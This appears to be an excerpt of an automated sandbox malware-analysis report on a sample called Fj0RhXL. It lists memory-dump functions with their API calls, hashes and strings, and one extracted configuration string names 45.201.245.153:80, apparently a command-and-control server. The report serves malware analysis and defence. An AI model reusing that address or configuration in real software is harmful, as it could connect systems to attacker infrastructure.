Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf$_sprintf$LineMovePixel__floor_pentium4
String ID: %c%3d%%$%c%d
API String ID: 134622598-1508660437
Opcode ID: dcda716aeca37690c54b9cfefb5a9962b8b790cc847f752048425b7dcf0a221c
Instruction ID: 70d93535d6b5d2ac2325d65e4ef0517d1a0e5ba78761e9dda42c32bbd06ee5f1
Opcode Fuzzy Hash: dcda716aeca37690c54b9cfefb5a9962b8b790cc847f752048425b7dcf0a221c
Instruction Fuzzy Hash: 7CB15B72B002189BCF14EFA9CC45A9DBBB9FB89308F15416AE449EB251DB31AD45CF81

Function 03DA6EFD Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 03DA6F25

Part of subcall function 03D9CB93: __getptd.LIBCMT ref: 03D9CBA1
Part of subcall function 03D9CB93: __getptd.LIBCMT ref: 03D9CBAF

__getptd.LIBCMT ref: 03DA6F2F

Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55

__getptd.LIBCMT ref: 03DA6F3D
__getptd.LIBCMT ref: 03DA6F4B
__getptd.LIBCMT ref: 03DA6F56
_CallCatchBlock2.LIBCMT ref: 03DA6F7C

Part of subcall function 03D9CC38: __CallSettingFrame@12.LIBCMT ref: 03D9CC84

Part of subcall function 03DA7023: __getptd.LIBCMT ref: 03DA7032
Part of subcall function 03DA7023: __getptd.LIBCMT ref: 03DA7040

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: f87ddd21ea2d298dc02b50d7b823a1122f517e041dcca18ea003818446b6167e
Instruction ID: 9b234d2b9daeaf9f0e772950158f44b3e0744ac4eacadece7830e354aef630e6
Opcode Fuzzy Hash: f87ddd21ea2d298dc02b50d7b823a1122f517e041dcca18ea003818446b6167e
Instruction Fuzzy Hash: 451104B5C00709DFDF00EFA9C544AEEBBB0FF08314F10846AE854AB261DB389A109F60

Function 02F137B3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 02F137DB

Part of subcall function 02F1336B: __getptd.LIBCMT ref: 02F13379
Part of subcall function 02F1336B: __getptd.LIBCMT ref: 02F13387

__getptd.LIBCMT ref: 02F137E5

Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE

__getptd.LIBCMT ref: 02F137F3
__getptd.LIBCMT ref: 02F13801
__getptd.LIBCMT ref: 02F1380C
_CallCatchBlock2.LIBCMT ref: 02F13832

Part of subcall function 02F13410: __CallSettingFrame@12.LIBCMT ref: 02F1345C

Part of subcall function 02F138D9: __getptd.LIBCMT ref: 02F138E8
Part of subcall function 02F138D9: __getptd.LIBCMT ref: 02F138F6

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 5408800feabe718df046e8921882716d13422771f6003ebbbee1a5a2cdc7f6c6
Instruction ID: 6ca321ad2ba00a4ce0df477238202f0185f47af76cc6600f6e53ae12db2c0516
Opcode Fuzzy Hash: 5408800feabe718df046e8921882716d13422771f6003ebbbee1a5a2cdc7f6c6
Instruction Fuzzy Hash: 4B115EB1D00209DFDF00EFA4C984AEE77B1FF04750F10806AE954AB251EB789A059F50

Function 03DA34F0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03DA34FC

Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55

__amsg_exit.LIBCMT ref: 03DA351C
__lock.LIBCMT ref: 03DA352C
InterlockedDecrement.KERNEL32(?), ref: 03DA3549
_free.LIBCMT ref: 03DA355C
InterlockedIncrement.KERNEL32(03F51658), ref: 03DA3574

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 30da8f80f76cdd38ac58c38b5c20864cd074eb0382ed7e2fe08c6182bc5b6220
Instruction ID: 5d50ca4d1c2c5410ca2c11f78b45fff6c1b2fc7fe4c5d24482964f6a1a5f6588
Opcode Fuzzy Hash: 30da8f80f76cdd38ac58c38b5c20864cd074eb0382ed7e2fe08c6182bc5b6220
Instruction Fuzzy Hash: BC01613A901F25DBD712FB6D950475DB7A1FF04B20F48404AE850AB384DB349A41CBE1

Function 02F0DACE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02F0DADA

Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE

__amsg_exit.LIBCMT ref: 02F0DAFA
__lock.LIBCMT ref: 02F0DB0A
InterlockedDecrement.KERNEL32(?), ref: 02F0DB27
_free.LIBCMT ref: 02F0DB3A
InterlockedIncrement.KERNEL32(034B1658), ref: 02F0DB52

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: dbb2dfb5abb2ba323c2ee35f06a2e41205a4210f97769b3831599c07742b852b
Instruction ID: df9618bfa731da6bdd3c7844488eeeb992f2470f8785ecada5ab68593b017cc1
Opcode Fuzzy Hash: dbb2dfb5abb2ba323c2ee35f06a2e41205a4210f97769b3831599c07742b852b
Instruction Fuzzy Hash: 9B01A171E416159BDB10ABA49894759F761EF44BD0F410005EA04672C0C7B4AA51EFD1

Function 03D94860 Relevance: 9.0, APIs: 6, Instructions: 42COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 03D94892
EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948A3
EnterCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948B8
GdiplusShutdown.GDIPLUS(00000000,?,?,?,03D9483B), ref: 03D948C4
LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948D5
LeaveCriticalSection.KERNEL32(03DC1EA4,?,?,?,03D9483B), ref: 03D948DC

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: 011bf90119c8f32c585da67bdadad503bb9c865fcd0cc0f8450ee3c358000ccf
Instruction ID: 132bdb1f1c87eaf60e94b10ab32fffe1f39971d912b4854903d1d22cc7c2bb11
Opcode Fuzzy Hash: 011bf90119c8f32c585da67bdadad503bb9c865fcd0cc0f8450ee3c358000ccf
Instruction Fuzzy Hash: 29011EB2920252EFCB04EF6A9880445BFA8FE4971537886AEE118C7317C772C40BCF91

Function 03D848B0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D848C1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D848CC
Sleep.KERNEL32(00000258), ref: 03D848D9
CloseHandle.KERNEL32(?), ref: 03D848F4
CloseHandle.KERNEL32(?), ref: 03D848FD
Sleep.KERNEL32(0000012C), ref: 03D8490E

Part of subcall function 03D83F30: GetCurrentThreadId.KERNEL32 ref: 03D83F35
Part of subcall function 03D83F30: send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
Part of subcall function 03D83F30: SetEvent.KERNEL32(?), ref: 03D83FBA
Part of subcall function 03D83F30: InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
Part of subcall function 03D83F30: WSACloseEvent.WS2_32(?), ref: 03D83FD4
Part of subcall function 03D83F30: shutdown.WS2_32(?,00000001), ref: 03D83FEC
Part of subcall function 03D83F30: closesocket.WS2_32(?), ref: 03D83FF6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
String ID:
API String ID: 1019945655-0
Opcode ID: 6e7f81ef28a7af89a6345891689cca8f80c238a41e2dc157a38427e092d61dbd
Instruction ID: 320abf1fa7b130dba72007ff7b555ba44b6f415691e0fe8b771d3f99b171deff
Opcode Fuzzy Hash: 6e7f81ef28a7af89a6345891689cca8f80c238a41e2dc157a38427e092d61dbd
Instruction Fuzzy Hash: 3CF01D772047059BC624FBA9DD84D4AF3A9AF89720B154B09E26587394CA71F901CBA0

Function 02F048C0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F048D1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F048DC
Sleep.KERNEL32(00000258), ref: 02F048E9
CloseHandle.KERNEL32(?), ref: 02F04904
CloseHandle.KERNEL32(?), ref: 02F0490D
Sleep.KERNEL32(0000012C), ref: 02F0491E

Part of subcall function 02F03F50: GetCurrentThreadId.KERNEL32 ref: 02F03F55
Part of subcall function 02F03F50: send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
Part of subcall function 02F03F50: SetEvent.KERNEL32(?), ref: 02F03FD9
Part of subcall function 02F03F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
Part of subcall function 02F03F50: WSACloseEvent.WS2_32(?), ref: 02F03FF3
Part of subcall function 02F03F50: shutdown.WS2_32(?,00000001), ref: 02F0400B
Part of subcall function 02F03F50: closesocket.WS2_32(?), ref: 02F04015

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
String ID:
API String ID: 1019945655-0
Opcode ID: ff81f591a84bcee76622ddf0d9bf9c254bd590fd343266cfcbec6ed6d0905ea1
Instruction ID: c0f9b55cb935c651c6dbe1086bba17d92a4dd2b6df466f9a9d28b65c3c4e3070
Opcode Fuzzy Hash: ff81f591a84bcee76622ddf0d9bf9c254bd590fd343266cfcbec6ed6d0905ea1
Instruction Fuzzy Hash: 67F030767046055BC624EBA9DC84D4AF3E9AFC9760B514B09E369872D0CA74E801CBA4

Function 03D832D0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D832E1
Sleep.KERNEL32(00000258), ref: 03D832EE
InterlockedExchange.KERNEL32(?,00000000), ref: 03D832F6
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D83302
WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D8330A
Sleep.KERNEL32(0000012C), ref: 03D8331B

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: 0b67ffb9b793e7abf2b49ec8bfc6b9cdceb65d1940ce2439d49c2fe5a7483540
Instruction ID: d6b18334030da7919eed2ef84ef13dfb7f6cbd22bc2d29cc1e91f6ba47298ae9
Opcode Fuzzy Hash: 0b67ffb9b793e7abf2b49ec8bfc6b9cdceb65d1940ce2439d49c2fe5a7483540
Instruction Fuzzy Hash: 98F01273204714AFD614ABA9DC84E56F3A8AF95734B204B0DB265D73D4CAB4E901CB60

Function 6C3DAE80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 6C3DAEB3
_siglookup.LIBCMT ref: 6C3DAEDA
DecodePointer.KERNEL32(D2CC993F,6C4430A8,00000020,6C3EDFDB,00000016,6C3DAACE,6C443028,00000008), ref: 6C3DAF32
__lock.LIBCMT ref: 6C3DAF59

Strings

PNv, xrefs: 6C3DAF32

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID: PNv
API String ID: 2847133137-4070351811
Opcode ID: 8ea0ea2ac4ea675df911a86d77b96f6eeea0a9898177d9a487b80167d8c9088d
Instruction ID: 99ef434d189b395b2a5ad509032e0d42004022c2aa1bc605abcc66ada66bf4b1
Opcode Fuzzy Hash: 8ea0ea2ac4ea675df911a86d77b96f6eeea0a9898177d9a487b80167d8c9088d
Instruction Fuzzy Hash: 5D41B1B3A05206DBCB04DF68CA84A8CB7B8FB45319B224A59E411E7F40C736B945CF76

Function 6C3A6DD6 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_fgets.LIBCMT ref: 6C3A6E58
_fgets.LIBCMT ref: 6C3A6EF4

Part of subcall function 6C3983BC: _sprintf.LIBCMT ref: 6C39858D

Strings

sedeltat.mdb, xrefs: 6C3A6E26
.;C:\Astrolog\, xrefs: 6C3A6DF7, 6C3A6DFC, 6C3A6E21
swe_deltat.mdb, xrefs: 6C3A6E01

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fgets$_sprintf
String ID: .;C:\Astrolog\$sedeltat.mdb$swe_deltat.mdb
API String ID: 73881602-1755570801
Opcode ID: 59ecb4a79d73c2a556112f677b2b0538bd4e7317c5157477db10c332f708fbe9
Instruction ID: aae5c90458d555d3454c3d1bfe5216906ae6fa2c1d501a6c25b081f89b34ce03
Opcode Fuzzy Hash: 59ecb4a79d73c2a556112f677b2b0538bd4e7317c5157477db10c332f708fbe9
Instruction Fuzzy Hash: 2F3159B19081155AEB108B6CDE40FE9B7B8CF1631CF2401A9D4C4D29D0EB76D9D68E11

Function 03D89C70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D89C8A

Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F

std::_Xinvalid_argument.LIBCPMT ref: 03D89CC2

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D89D22

Strings

invalid string position, xrefs: 03D89C85
string too long, xrefs: 03D89CBD

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: edde279050a1eaf5d12de3e604d4915dce68ca47ec9f8541870b2544ebcabf7f
Instruction ID: 2df102caa2f155fa6ef437e740533111fba3bc78a1fcd31ed0ae47d292235eee
Opcode Fuzzy Hash: edde279050a1eaf5d12de3e604d4915dce68ca47ec9f8541870b2544ebcabf7f
Instruction Fuzzy Hash: 5321A7337042109BD721FB6CE890A7AF7D9EB91664B24056FF1D2CB641C772E84083A5

Function 02F05D50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D68
_memset.LIBCMT ref: 02F05D72
lstrlenW.KERNEL32(|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D7F
lstrlenW.KERNEL32(?,?,?,?,?,?,02F05E77,p1:,02F1C6FE,00000000,02F1C6E0,00000000,000012A0,|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02F05D87

Strings

|p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02F05D7A

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: lstrlen$_memset
String ID: |p1:45.201.245.153|o1:80|t1:1|p2:45.201.245.153|o2:80|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
API String ID: 2425037729-4171861867
Opcode ID: 2b14d823233d0de01798bfad3937c11d1c653bb72ab8cb5ad0afda325f2ae37c
Instruction ID: 6521bc5ac7f629046ccfe0d812fc43270241e2d5fbcef08638d0da76d1401bff
Opcode Fuzzy Hash: 2b14d823233d0de01798bfad3937c11d1c653bb72ab8cb5ad0afda325f2ae37c
Instruction Fuzzy Hash: 39213D72F020186BCF145F55EC846AEB359FB84BA0FD1016ADE05C7240E7B259518AE0

Function 03D8AD20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8AD39

Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F

std::_Xinvalid_argument.LIBCPMT ref: 03D8AD57
_memmove.LIBCMT ref: 03D8AD9B

Strings

invalid string position, xrefs: 03D8AD34
string too long, xrefs: 03D8AD52

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 2bdbedec2247cb65aa6e8ccac8cf6458bc2a91d7909045fa5dbbe281fb8cc46d
Instruction ID: b9cec894773bb4228671de525b13a21d9d61c8ccd5a9ec58ab84ea00498a3dcc
Opcode Fuzzy Hash: 2bdbedec2247cb65aa6e8ccac8cf6458bc2a91d7909045fa5dbbe281fb8cc46d
Instruction Fuzzy Hash: 44218C76700306AFCB14EF68E8808A9B3AAFF48219714062BE516CF651EB30F955C7A0

Function 03D85370 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 03D8539F
std::exception::exception.LIBCMT ref: 03D853D5

Part of subcall function 03D9AA16: std::exception::_Copy_str.LIBCMT ref: 03D9AA31

__CxxThrowException@8.LIBCMT ref: 03D853EA

Part of subcall function 03D9C868: RaiseException.KERNEL32(?,?,03D9AC51,?,?,?,?,?,03D9AC51,?,03DB7C00,03DC1FC0,?,?,03D98BBF,00000068), ref: 03D9C8AA

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 03D853F1

Strings

bad locale name, xrefs: 03D853CE

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 73090415-1405518554
Opcode ID: b3ea25daa8b894d1748aa849b6be612c32ba48ce03a1546a81c4338c01e56d37
Instruction ID: c181ccdb2d11159ce29d5a8fc627c24f079f526c964633726113ec0752bf36c5
Opcode Fuzzy Hash: b3ea25daa8b894d1748aa849b6be612c32ba48ce03a1546a81c4338c01e56d37
Instruction Fuzzy Hash: 41118FB2905788DFCB21DF59C880A9EFBF8FB19610F40866FE45693740D7346608CBA5

Function 03DA72AA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 03DA72BD

Part of subcall function 03DA7218: ___BuildCatchObjectHelper.LIBCMT ref: 03DA724E

_UnwindNestedFrames.LIBCMT ref: 03DA72D4
___FrameUnwindToState.LIBCMT ref: 03DA72E2

Strings

csm, xrefs: 03DA72B9, 03DA72CE, 03DA72E1, 03DA72FF, 03DA730F
csm, xrefs: 03DA72AC

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: dd87a3a69fd9cbd62dce8db1b6b98e2948fda29e9069b592d2c3bb4e41ac0c37
Instruction ID: 63bb8c517f67914be7434e44ebccd8d1c2d1681bdbd7b89301f7eeefc2d0a3d4
Opcode Fuzzy Hash: dd87a3a69fd9cbd62dce8db1b6b98e2948fda29e9069b592d2c3bb4e41ac0c37
Instruction Fuzzy Hash: A2014676001609BBDF12AF95CD44EAA7F6AEF08350F088021FD1819160D732DAB1DBA0

Function 032C352D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 032C3540

Part of subcall function 032C349B: ___BuildCatchObjectHelper.LIBCMT ref: 032C34D1

_UnwindNestedFrames.LIBCMT ref: 032C3557
___FrameUnwindToState.LIBCMT ref: 032C3565

Strings

csm, xrefs: 032C353C, 032C3551, 032C3564, 032C3582, 032C3592
csm, xrefs: 032C352F

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

